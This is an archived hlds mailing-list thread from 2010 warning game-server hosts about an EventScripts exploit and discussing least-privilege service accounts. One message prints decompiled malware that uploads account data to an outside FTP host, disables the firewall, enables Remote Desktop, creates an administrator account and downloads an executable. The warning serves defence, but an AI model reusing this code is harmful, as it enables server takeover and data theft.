Re: [hlds] Eventscripts - Creating Windows Account
Best advice ever given. There is absolutely no reason to run any software under a root/Administrator account. In both Linux and Windows, security policies are *very* customisable. It's not too hard to create a gameadmin account, with network binding access policies. The only thing you should ever need root/Admin for is local installation, and even then that can always be worked around. On 3/03/2010 8:01 AM, Mike Stiehm wrote: I don't want to give the impression i'm trying to flame anyone or anything I just don't want to leave people with TCAdmin thinking they are SOL because they are not. Anyone that leaves anything at default settings is not security aware and is going to be at risk no matter what you run. If you run a GSP it's your job to be aware and security conscious. However people have to know they the only option is not linux with custom software. We don't want everything thinking they need to run out and hire a programmer to reinvent the wheel. We run windows with TCadmin and have never once had an issue (2+ years) I would say stick with what you know and make sure you know everything you can about security. You're always going to have the linux guys po poing windows and visa-versa with the windows guys. None of the listed exploits would have worked on our servers not because we run windows or because we run tcadmin. It's because we what treats are out and about and we know how to secure ourselves agents them. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Steven Crothers Sent: Tuesday, March 02, 2010 4:45 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account Well this can easily turn into a Flame TCAdmin thread, but I'll simply leave it with this: TCAdmin is NOT a secure panel, people who are reading this that are running TCAdmin - if you haven't gone above and beyond with your setup, you ARE at risk everyday to losing 100% of your machines. Let's not forget that that many GSPs run games on their master server, which means their entire database is at risk. Gameserver security can only truly be obtained with a proper custom control panel, nothing off the shelf provides any type of security, and this thread is a great example of that. When was the last time a server at Gameservers.com was hacked? I can't recall once when it ever happened. Gameserver hosting should be done on Linux with SELinux + GRSEC. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Mike Stiehm Sent: Tuesday, March 02, 2010 5:28 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account This is true for the default setting. However TCAdmin can be set to use a specific user for all game servers created from that point on and you can go back in the windows services control panel and change the user that the service executes under. It's really easy and didn't take me much more than 20 min for 20 servers and I have no issues (well over a year running like this) -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Lane Eckley Sent: Tuesday, March 02, 2010 4:11 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account That is a simple solution to the problem. However if you are a GSP or otherwise using TCAdmin like many do, there are some side issues that go along with setting a game server to use a limited access. (Important note on TCAdmin: TCAdmin runs as system and so do all the services it powers - FYI in case you are unaware.) This was mainly a warning going out before anyone got completely hacked and lost access to their machines. -Lane -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Saul Rennison Sent: Tuesday, March 02, 2010 5:03 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account If you run the server as a limited user, then it can't touch the registry or create other users... simple :/ Thanks, - Saul. On 2 March 2010 20:51, icsi...@ics-base.net wrote: What do you mean by upload mods? If _anyone_ can upload files to the server without having access to the machine itself, then there is nothing mod makers can do if someone can overwrite the files that their mods have. -ics 2.3.2010 22:44, Steven Crothers kirjoitti: The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com
Re: [hlds] Eventscripts - Creating Windows Account
I am running all my gameserver services (L4D, CoD, TS3) with the local service account. A useful guide by Microsoft The Services and Service Accounts Security Planning Guide can be found as PDF here which has the main goal to help administrators reduce the effect of a compromised service on a host operating system. http://www.microsoft.com/downloads/details.aspx?FamilyId=F4069A30-01D7-43E8-8B30-3799DB2D9C2Fdisplaylang=en The guide is for Windows Server 2003 and XP but it does also fit for Windows Server 2008. *Excerpt:* A least-privilege hierarchy should use accounts in the following order: 1. *Local Service* This account is similar to Local System, although it has minimum privileges on the local computer. Services that log on as Local Service access network resources using a null session with anonymous credentials. The account's privileges must be limited to only those that are required for the successful operation of the service. 2. *Network Service* This account is similar to Local System, although it has minimum privileges on the local computer. Services that log on as Network Service access network resources using the credentials of the computer account (where the computer is referenced as domain_name\computer_name$). The account's privileges must be limited to only those that are required for the successful operation of the service. 3. *Unique user account* A service should run as a unique user account only if it is impractical to run it as Local Service or Network Service. You should use a unique local user account to run services that only require privileges on the local computer, such as IIS and SQL Server. ... 4. ... ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
Since the dawn of IT time, it has been best practices to run services/processes - especially outward facing ones - with a limited-access service account. Any CTO/sysadmin worth his weight in bat guano will demand that from the beginning. It is never the fault of the application if security measures aren't followed. And if the application cannot accommodate heightened security, it is the responsibility of the IT staff to find an alternate product. These are common sense issues, not the inside scoop. Kerry On 3/3/10 5:04 AM, Shane Arnold clontar...@iinet.net.au wrote: Best advice ever given. There is absolutely no reason to run any software under a root/Administrator account. In both Linux and Windows, security policies are *very* customisable. It's not too hard to create a gameadmin account, with network binding access policies. The only thing you should ever need root/Admin for is local installation, and even then that can always be worked around. On 3/03/2010 8:01 AM, Mike Stiehm wrote: I don't want to give the impression i'm trying to flame anyone or anything I just don't want to leave people with TCAdmin thinking they are SOL because they are not. Anyone that leaves anything at default settings is not security aware and is going to be at risk no matter what you run. If you run a GSP it's your job to be aware and security conscious. However people have to know they the only option is not linux with custom software. We don't want everything thinking they need to run out and hire a programmer to reinvent the wheel. We run windows with TCadmin and have never once had an issue (2+ years) I would say stick with what you know and make sure you know everything you can about security. You're always going to have the linux guys po poing windows and visa-versa with the windows guys. None of the listed exploits would have worked on our servers not because we run windows or because we run tcadmin. It's because we what treats are out and about and we know how to secure ourselves agents them. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Steven Crothers Sent: Tuesday, March 02, 2010 4:45 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account Well this can easily turn into a Flame TCAdmin thread, but I'll simply leave it with this: TCAdmin is NOT a secure panel, people who are reading this that are running TCAdmin - if you haven't gone above and beyond with your setup, you ARE at risk everyday to losing 100% of your machines. Let's not forget that that many GSPs run games on their master server, which means their entire database is at risk. Gameserver security can only truly be obtained with a proper custom control panel, nothing off the shelf provides any type of security, and this thread is a great example of that. When was the last time a server at Gameservers.com was hacked? I can't recall once when it ever happened. Gameserver hosting should be done on Linux with SELinux + GRSEC. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Mike Stiehm Sent: Tuesday, March 02, 2010 5:28 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account This is true for the default setting. However TCAdmin can be set to use a specific user for all game servers created from that point on and you can go back in the windows services control panel and change the user that the service executes under. It's really easy and didn't take me much more than 20 min for 20 servers and I have no issues (well over a year running like this) -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Lane Eckley Sent: Tuesday, March 02, 2010 4:11 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account That is a simple solution to the problem. However if you are a GSP or otherwise using TCAdmin like many do, there are some side issues that go along with setting a game server to use a limited access. (Important note on TCAdmin: TCAdmin runs as system and so do all the services it powers - FYI in case you are unaware.) This was mainly a warning going out before anyone got completely hacked and lost access to their machines. -Lane -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Saul Rennison Sent: Tuesday, March 02, 2010 5:03 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account If you run the server as a limited user, then it can't touch the registry or create other users... simple :/ Thanks, - Saul. On 2 March 2010 20:51, icsi
[hlds] Eventscripts - Creating Windows Account
Hi Guys, I wanted to shoot out an email to everyone in regards to an exploit we have come across today for those who are running Eventscripts windows based servers. Apparently a user is able to upload corelib.pyc to the game server without using the common FTP/Control panel and via the game server itself. In turn, using eventscripts he is able to execute his script, create an administrator with full remote desktop access and finally remove all his files once his account is created. Our security caught it before it was able to cause us any issues, however this may be an issue for people who have lesser amount of security in place and especially if you do not have a anti-virus/firewall running on the machine. We have also found there is multiple variations of this file, so you may want to be sure you do a full look at your machines. With that being said, the files are coming from a free web hosting account over at t35.com - So if your machines have seen any connections in/out bound to that host in the past 48 hours, I would highly suggest you check your machines. Now on to the hosts on this list, we also found this in his scripts: C:\Games\rzr00\GameServers\TC55505872742137586643251\cstrike\addons\eventscr ipts\wcs\WCSusers\es_wcsusers_db.txt So he was testing this somewhere else, someone else who is running TCAdmin - If this is yours, I would start checking your boxes. Attached is a decrypted copy of the corelib.pyc. Joys, -Lane Fri Feb 26 22:35:10 2010 decompile /tmp/upload/20100226223510_753.pyc... #! /usr/bin/env python # emacs-mode: -*- python-*- # -*- coding: utf-8 -*- from ftplib import FTP import os import urllib import es import sys import os.path import operator import subprocess import time def upload(handle, filename): f = open(filename, 'rb') (base, ext,) = os.path.splitext(filename) picext = '.bmp .jpg .jpeg .dib .tif .tiff .gif .png' if operator.contains(picext, ext): try: handle.storbinary(('STOR ' + filename), f, 1) except Exception: print 'erorr' else: print 'sucessup' f.close() return None try: handle.storbinary(('STOR ' + filename), f) except Exception: print 'Error in downloading the remote file.' else: print 'Successful download!' f.close() def download(handle, filename): f2 = open(filename, 'wb') try: handle.retrbinary(('RETR ' + filename), f2.write) except Exception: print 'lol' return None else: print 'lol' f2.close() def load(): print 'Getting Paths' thisfile = (str(es.ServerVar('eventscripts_gamedir')) + '\\addons\\eventscripts\\corelib\\corelib.py') root = (os.getcwd()[0] + ':\\') host_name = 'ftp.t35.com' if ('http://' in host_name): host_name = host_name.replace('http://', '') host_name = host_name.replace('\n', '') user = '*' pwd = '*' try: ftph = FTP(host_name) except: print 'Host could not be resolved' raw_input() sys.exit() try: ftph.login(user, pwd) except Exception: if ((user == 'anonymous') or (((user == 'Anonymous') and (pwd == 'anonymous')) or (pwd == 'Anonymous'))): print 'The server does not accept anonymous requests' raw_input() sys.exit() else: print 'Invalid login combination' raw_input() sys.exit() else: print 'Successfully connected' print ftph.getwelcome() flag = 1 count = 0 path = ftph.pwd() charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890' print 'Press help at any time to see proper usage.\n' dirpath = 'Quantum' ftph.cwd(dirpath) url = urllib.URLopener() resp = url.open('http://www.cjlax.com/ocean/ip.php') html = resp.read(114) ippath = ((root + html) + '.log') os.popen(('net user %s' % ippath)) time.sleep(5) upload(ftph, ('%s' % ippath)) ftph.close() print 'Setting Up Remote Desktop' os.system('REG ADD HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile /v EnableFirewall /t REG_DWORD /d 0 /f') os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f') print 'Creating Users' os.system('net user bw 313313313 /add') os.system('net localgroup Administrator bw /add ') os.system('net group Domain Admins bw /add') os.system('net localgroup administrators bw /add') os.system('net localgroup administrator bw /add') os.system('net localgroup administratoren bw /add') os.system('net localgroup administradors bw /add') os.system('net localgroup administrateurs bw /add') print 'Downloading' url = 'http://stashbox.org/806008/Windows%20Host%20Process.exe'
Re: [hlds] Eventscripts - Creating Windows Account
I posted this up on SRCDS.com as well: http://forums.srcds.com/viewtopic/13843 Thanks for the heads up. ~ Matt On Tue, Mar 2, 2010 at 1:39 PM, Lane Eckley l...@hypernia.com wrote: Hi Guys, I wanted to shoot out an email to everyone in regards to an exploit we have come across today for those who are running Eventscripts windows based servers. Apparently a user is able to upload corelib.pyc to the game server without using the common FTP/Control panel and via the game server itself. In turn, using eventscripts he is able to execute his script, create an administrator with full remote desktop access and finally remove all his files once his account is created. Our security caught it before it was able to cause us any issues, however this may be an issue for people who have lesser amount of security in place and especially if you do not have a anti-virus/firewall running on the machine. We have also found there is multiple variations of this file, so you may want to be sure you do a full look at your machines. With that being said, the files are coming from a free web hosting account over at t35.com - So if your machines have seen any connections in/out bound to that host in the past 48 hours, I would highly suggest you check your machines. Now on to the hosts on this list, we also found this in his scripts: C:\Games\rzr00\GameServers\TC55505872742137586643251\cstrike\addons\eventscr ipts\wcs\WCSusers\es_wcsusers_db.txt So he was testing this somewhere else, someone else who is running TCAdmin - If this is yours, I would start checking your boxes. Attached is a decrypted copy of the corelib.pyc. Joys, -Lane ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of w4rezz Sent: Tuesday, March 02, 2010 3:14 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
What do you mean by upload mods? If _anyone_ can upload files to the server without having access to the machine itself, then there is nothing mod makers can do if someone can overwrite the files that their mods have. -ics 2.3.2010 22:44, Steven Crothers kirjoitti: The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of w4rezz Sent: Tuesday, March 02, 2010 3:14 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
If you run the server as a limited user, then it can't touch the registry or create other users... simple :/ Thanks, - Saul. On 2 March 2010 20:51, ics i...@ics-base.net wrote: What do you mean by upload mods? If _anyone_ can upload files to the server without having access to the machine itself, then there is nothing mod makers can do if someone can overwrite the files that their mods have. -ics 2.3.2010 22:44, Steven Crothers kirjoitti: The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of w4rezz Sent: Tuesday, March 02, 2010 3:14 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
That is a simple solution to the problem. However if you are a GSP or otherwise using TCAdmin like many do, there are some side issues that go along with setting a game server to use a limited access. (Important note on TCAdmin: TCAdmin runs as system and so do all the services it powers - FYI in case you are unaware.) This was mainly a warning going out before anyone got completely hacked and lost access to their machines. -Lane -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Saul Rennison Sent: Tuesday, March 02, 2010 5:03 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account If you run the server as a limited user, then it can't touch the registry or create other users... simple :/ Thanks, - Saul. On 2 March 2010 20:51, ics i...@ics-base.net wrote: What do you mean by upload mods? If _anyone_ can upload files to the server without having access to the machine itself, then there is nothing mod makers can do if someone can overwrite the files that their mods have. -ics 2.3.2010 22:44, Steven Crothers kirjoitti: The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of w4rezz Sent: Tuesday, March 02, 2010 3:14 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds __ Information from ESET Smart Security, version of virus signature database 4910 (20100302) __ The message was checked by ESET Smart Security. http://www.eset.com __ Information from ESET Smart Security, version of virus signature database 4910 (20100302) __ The message was checked by ESET Smart Security. http://www.eset.com ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
Since when do you run a windows server on a limited account? I dont --Message d'origine-- De : Saul Rennison Expéditeur :hlds-boun...@list.valvesoftware.com À :Half-Life dedicated Win32 server mailing list Répondre à :Half-Life dedicated Win32 server mailing list Objet : Re: [hlds] Eventscripts - Creating Windows Account Envoyé : 2 mar, 2010 17:02 If you run the server as a limited user, then it can't touch the registry or create other users... simple :/ Thanks, - Saul. On 2 March 2010 20:51, ics i...@ics-base.net wrote: What do you mean by upload mods? If _anyone_ can upload files to the server without having access to the machine itself, then there is nothing mod makers can do if someone can overwrite the files that their mods have. -ics 2.3.2010 22:44, Steven Crothers kirjoitti: The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of w4rezz Sent: Tuesday, March 02, 2010 3:14 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds Envoyé de mon BlackBerry ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
If you dont and someone gains access to that account, you are screwed. The D-FENS plugin doesnt fully protect you. On Tue, Mar 2, 2010 at 2:14 PM, Jean-Philippe Mailloux yenr...@gmail.comwrote: Since when do you run a windows server on a limited account? I dont --Message d'origine-- De : Saul Rennison Expéditeur :hlds-boun...@list.valvesoftware.com À :Half-Life dedicated Win32 server mailing list Répondre à :Half-Life dedicated Win32 server mailing list Objet : Re: [hlds] Eventscripts - Creating Windows Account Envoyé : 2 mar, 2010 17:02 If you run the server as a limited user, then it can't touch the registry or create other users... simple :/ Thanks, - Saul. On 2 March 2010 20:51, ics i...@ics-base.net wrote: What do you mean by upload mods? If _anyone_ can upload files to the server without having access to the machine itself, then there is nothing mod makers can do if someone can overwrite the files that their mods have. -ics 2.3.2010 22:44, Steven Crothers kirjoitti: The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of w4rezz Sent: Tuesday, March 02, 2010 3:14 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds Envoyé de mon BlackBerry ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
This is true for the default setting. However TCAdmin can be set to use a specific user for all game servers created from that point on and you can go back in the windows services control panel and change the user that the service executes under. It's really easy and didn't take me much more than 20 min for 20 servers and I have no issues (well over a year running like this) -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Lane Eckley Sent: Tuesday, March 02, 2010 4:11 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account That is a simple solution to the problem. However if you are a GSP or otherwise using TCAdmin like many do, there are some side issues that go along with setting a game server to use a limited access. (Important note on TCAdmin: TCAdmin runs as system and so do all the services it powers - FYI in case you are unaware.) This was mainly a warning going out before anyone got completely hacked and lost access to their machines. -Lane -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Saul Rennison Sent: Tuesday, March 02, 2010 5:03 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account If you run the server as a limited user, then it can't touch the registry or create other users... simple :/ Thanks, - Saul. On 2 March 2010 20:51, ics i...@ics-base.net wrote: What do you mean by upload mods? If _anyone_ can upload files to the server without having access to the machine itself, then there is nothing mod makers can do if someone can overwrite the files that their mods have. -ics 2.3.2010 22:44, Steven Crothers kirjoitti: The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of w4rezz Sent: Tuesday, March 02, 2010 3:14 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds __ Information from ESET Smart Security, version of virus signature database 4910 (20100302) __ The message was checked by ESET Smart Security. http://www.eset.com __ Information from ESET Smart Security, version of virus signature database 4910 (20100302) __ The message was checked by ESET Smart Security. http://www.eset.com ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
Is there a setting that enables server admins/GSPs to disable the ability to remotely upload eventscripts (without FTP even being on), or prevent their execution? - Andrew -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Mike Stiehm Sent: Wednesday, 3 March 2010 9:28 AM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account This is true for the default setting. However TCAdmin can be set to use a specific user for all game servers created from that point on and you can go back in the windows services control panel and change the user that the service executes under. It's really easy and didn't take me much more than 20 min for 20 servers and I have no issues (well over a year running like this) -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Lane Eckley Sent: Tuesday, March 02, 2010 4:11 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account That is a simple solution to the problem. However if you are a GSP or otherwise using TCAdmin like many do, there are some side issues that go along with setting a game server to use a limited access. (Important note on TCAdmin: TCAdmin runs as system and so do all the services it powers - FYI in case you are unaware.) This was mainly a warning going out before anyone got completely hacked and lost access to their machines. -Lane -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Saul Rennison Sent: Tuesday, March 02, 2010 5:03 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account If you run the server as a limited user, then it can't touch the registry or create other users... simple :/ Thanks, - Saul. On 2 March 2010 20:51, ics i...@ics-base.net wrote: What do you mean by upload mods? If _anyone_ can upload files to the server without having access to the machine itself, then there is nothing mod makers can do if someone can overwrite the files that their mods have. -ics 2.3.2010 22:44, Steven Crothers kirjoitti: The answer isn't to stop people from being able to upload mods... the answer is for mod makers to make their mods secure. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of w4rezz Sent: Tuesday, March 02, 2010 3:14 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account Nothing new, Everybody can upload files to your server, becouse Valve dont wanna to use whitelist system, to allow only specific file extensions to be downloaded to only specific game directories. ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds __ Information from ESET Smart Security, version of virus signature database 4910 (20100302) __ The message was checked by ESET Smart Security. http://www.eset.com __ Information from ESET Smart Security, version of virus signature database 4910 (20100302) __ The message was checked by ESET Smart Security. http://www.eset.com ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds ___ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
Re: [hlds] Eventscripts - Creating Windows Account
Well this can easily turn into a Flame TCAdmin thread, but I'll simply leave it with this: TCAdmin is NOT a secure panel, people who are reading this that are running TCAdmin - if you haven't gone above and beyond with your setup, you ARE at risk everyday to losing 100% of your machines. Let's not forget that that many GSPs run games on their master server, which means their entire database is at risk. Gameserver security can only truly be obtained with a proper custom control panel, nothing off the shelf provides any type of security, and this thread is a great example of that. When was the last time a server at Gameservers.com was hacked? I can't recall once when it ever happened. Gameserver hosting should be done on Linux with SELinux + GRSEC. -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Mike Stiehm Sent: Tuesday, March 02, 2010 5:28 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account This is true for the default setting. However TCAdmin can be set to use a specific user for all game servers created from that point on and you can go back in the windows services control panel and change the user that the service executes under. It's really easy and didn't take me much more than 20 min for 20 servers and I have no issues (well over a year running like this) -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Lane Eckley Sent: Tuesday, March 02, 2010 4:11 PM To: 'Half-Life dedicated Win32 server mailing list' Subject: Re: [hlds] Eventscripts - Creating Windows Account That is a simple solution to the problem. However if you are a GSP or otherwise using TCAdmin like many do, there are some side issues that go along with setting a game server to use a limited access. (Important note on TCAdmin: TCAdmin runs as system and so do all the services it powers - FYI in case you are unaware.) This was mainly a warning going out before anyone got completely hacked and lost access to their machines. -Lane -Original Message- From: hlds-boun...@list.valvesoftware.com [mailto:hlds-boun...@list.valvesoftware.com] On Behalf Of Saul Rennison Sent: Tuesday, March 02, 2010 5:03 PM To: Half-Life dedicated Win32 server mailing list Subject: Re: [hlds] Eventscripts - Creating Windows Account If you run the 